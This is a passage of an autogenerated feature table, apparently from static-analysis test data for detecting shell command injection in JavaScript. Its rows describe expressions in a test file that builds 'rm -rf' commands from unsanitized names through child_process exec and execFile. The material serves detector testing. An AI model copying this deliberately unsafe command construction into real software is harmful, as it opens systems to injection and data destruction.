Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:28:91:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:28:91:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:28:91:31 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:28:91:31 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:28:91:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:28:91:31 | name | stringConcatenatedWith | '"' -endpoint- '"' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:35:91:38 | "\\"" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:35:91:38 | "\\"" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:35:91:38 | "\\"" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:35:91:38 | "\\"" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:35:91:38 | "\\"" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:35:91:38 | "\\"" | stringConcatenatedWith | '"' + name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:41:91:44 | join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:41:91:44 | join | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:41:91:44 | join | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:41:91:44 | join | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:41:91:44 | join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | CalleeFlexibleAccessPath | ?.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:46:91:48 | " " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:3 | cp | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:3 | cp | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:12 | cp.execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:12 | cp.execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:12 | cp.execFile | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:12 | cp.execFile | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:12 | cp.execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | exceptional return of cp.exec ... name]) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | exceptional return of cp.exec ... name]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | exceptional return of cp.exec ... name]) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | exceptional return of cp.exec ... name]) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | exceptional return of cp.exec ... name]) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:5:93:12 | execFile | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:5:93:12 | execFile | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:5:93:12 | execFile | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:5:93:12 | execFile | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:5:93:12 | execFile | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:14:93:17 | "rm" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:20:93:32 | ["-rf", name] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:21:93:25 | 